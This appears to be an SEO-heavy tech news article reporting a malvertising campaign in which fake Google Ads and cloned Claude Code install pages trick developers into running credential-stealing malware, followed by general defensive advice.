Security researchers at Bitdefender and Push Security uncovered a campaign where malware intelligence confirmed that hackers used fake Google Ads to target developers, by cloning Anthropic’s Claude Code pages, and tricking users to deploy AI malware using InstallFix tactics.
The latest crop of attacks shows a worrying degree of accuracy and weaponizing AI for malware, moving away from the common email phishing schemes and targeting trusted search engines and installation practices of developers.
Using malware intelligence, shows how attackers are now weaponizing AI for malware by turning trusted developer workflows against the users themselves.
Anatomy of AI malware Trap
The campaign centers on malicious SEO for AI. The use of paid Google Ads to push fake results to the top of search queries.
When a developer searches for Claude Code install or Claude CLI, they are linked with a sponsored link that looks identical to an official resource. It’s a classic example of how criminals are weaponizing AI for malware to put their hand on a system.
Once clicked, the user is taken to malicious clones of the official website. These sites are so convincing that even seasoned professionals might not notice the deception. While most links on the fake page redirect to legitimate Anthropic sites to maintain the illusion, the critical “install” command is switched.
This represents a new era of AI malicious solutions where the delivery method is as polished as the software it mimics.
Instead of a standard setup, the command triggers a hidden script.
“Unless you’re carefully reading the URL embedded in the install one-liner (and let’s be honest, almost nobody does these days), the page is indistinguishable from the real one,” researchers noted.
This method acts as a zero-click spy tool once the initial command is pasted, as the malware begins its work immediately without further user interaction. The malware intelligence shows that this InstallFix method exploits the common developer’s habit of copying and pasting computer commands directly from the web.
Stolen Credentials and System Risks
The contents delivered in these attacks are often the Amatera Stealer or ACR Stealer, a type of malware-as-a-service. This is a clear case of weaponizing AI for malware to strip a machine of its most sensitive data.
Once executed, the software quietly harvests browser-stored passwords, session cookies, cryptocurrency wallets, and authentication tokens. Malware intelligence indicates that these tools are becoming increasingly automated.
For an organization, the risk is intensified because developer workstations are privileged endpoints. These machines often hold access to Cloud support and code sources. Because of this, security teams are now advocating zero-trust for AI tools to ensure that no installer is trusted by default.
This is critical because hackers are now using AI code for malware to create more vague scripts.
This trend highlights a growing vulnerability in how we adopt new technology. As teams rush to test the latest tools, the lack of malware intelligence can lead to disaster. Experts warn that malicious Seo for AI gives criminals fresh branding to exploit.
To stay safe, researchers suggest that using AI code for malware detection may be necessary, but the best defense remains navigating directly to official vendor domains for all software downloads.
Inside Telecom provides you with an extensive list of content covering all aspects of the tech industry. Keep an eye on our Cybersecurity sections to stay informed and up-to-date with our daily articles.